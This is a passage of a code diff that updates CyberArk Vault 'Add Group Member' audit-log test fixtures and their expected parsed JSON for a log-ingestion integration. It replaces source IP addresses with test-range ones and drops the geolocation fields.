Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json index 7e45bbf278e..a1dd3cc9ca8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMPApp_localhost.localdomain", "source_user": "PSMAppUsers", @@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730009500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577462300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -74,20 +62,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -104,7 +80,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -112,7 +88,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMPGW_localhost.localdomain", "source_user": "PVWAGWAccounts", @@ -128,8 +104,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730026800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577470900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -141,20 +117,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -171,7 +135,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -179,7 +143,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:35Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMP_ADB_localhost.localdomain", "source_user": "PSMP_ADB_AppUsers", @@ -195,8 +159,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730031500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577476600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -208,20 +172,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -238,7 +190,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -246,7 +198,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:58:01Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "Administrator", "source_user": "PSMMaster", @@ -262,8 +214,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730035100Z", - "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 